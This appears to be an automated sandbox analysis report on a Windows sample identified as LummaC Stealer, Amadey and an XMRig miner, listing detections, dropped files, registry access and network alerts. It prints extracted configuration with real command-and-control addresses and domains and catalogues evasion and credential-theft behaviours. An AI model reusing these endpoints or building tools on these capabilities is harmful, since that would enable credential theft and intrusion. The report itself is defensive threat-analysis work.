Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1579277
MD5: 76c2f75bf3efb5964c432f7661d22d58
SHA1: 521badd0c5d9f85986a7845b3163b82b87c0589d
SHA256: 939310706200640f603a1fb3e6528c3a4bafa87e0d610e817a7824cf2e089bc7
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, LummaC Stealer, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to start a terminal service
Creates files in the system32 config directory
Drops password protected ZIP file
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found strings related to Crypto-Mining
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Leaks process information
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
xmrig According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe Avira: detection malicious, Label: HEUR/AGEN.1352802
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Avira: detection malicious, Label: HEUR/AGEN.1352802
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000005.00000002.2930996247.0000000000151000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000002C.00000002.2937965345.00000000013C8000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: LummaC {"C2 url": ["treehoneyi.click", "energyaffai.lat", "sustainskelet.lat", "discokeyus.lat", "grannyejh.lat", "rapeflowwj.lat", "crosshuaht.lat", "aspecteirs.lat", "necklacebudi.lat"], "Build id": "rAGxSF--load"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe ReversingLabs: Detection: 69%
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 55% Perma Link
Source: file.exe ReversingLabs: Detection: 55%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_d38828e7-d

Bitcoin Miner
barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 47.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000002.2529597968.0000000001319000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2529597968.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2530687816.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2881532847.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2881532847.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2530936090.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2882244663.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2881532847.0000000000714000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2882428177.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 8088, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 8060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 6248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6284, type: MEMORYSTR
Found strings related to Crypto-Mining
Source: Intel_PTT_EK_Recertification.exe, 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: Intel_PTT_EK_Recertification.exe, 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: cryptonight/0
Source: Intel_PTT_EK_Recertification.exe, 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: Intel_PTT_EK_Recertification.exe, 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Google\Chrome\Extensions
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\graph
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\graph\graph.exe
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49825 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.91.209:443 -> 192.168.2.4:49925 version: TLS 1.2
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: 4115805b10.exe, 00000027.00000003.2754575088.00000268125C2000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000029.00000000.2754980065.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 00000029.00000002.2936121844.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002B.00000002.2935569861.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002B.00000000.2777839944.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000000.2854750206.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000002.2936047599.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: 4115805b10.exe, 00000027.00000000.2649047959.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000002.2797453206.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000002.2820458214.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: 4115805b10.exe, 00000027.00000000.2649047959.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000002.2797453206.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000002.2820458214.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: skotes.exe, 00000005.00000002.2942570852.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp, 322c3dce5b.exe, 00000033.00000000.2907742348.0000000000032000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: skotes.exe, 00000005.00000002.2942570852.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp, 322c3dce5b.exe, 00000033.00000000.2907742348.0000000000032000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: 4115805b10.exe, 00000027.00000003.2754575088.00000268125C2000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000029.00000000.2754980065.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 00000029.00000002.2936121844.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002B.00000002.2935569861.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002B.00000000.2777839944.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000000.2854750206.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000002.2936047599.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Directory queried: number of queries: 1001
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime, 6_2_0040367D
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 6_2_004031DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C87978 FindFirstFileW,FindFirstFileW,free, 10_2_00C87978
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00C8881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free, 10_2_00C8881C
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\main\extracted Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49748 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49754
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49804 -> 185.215.113.43:80
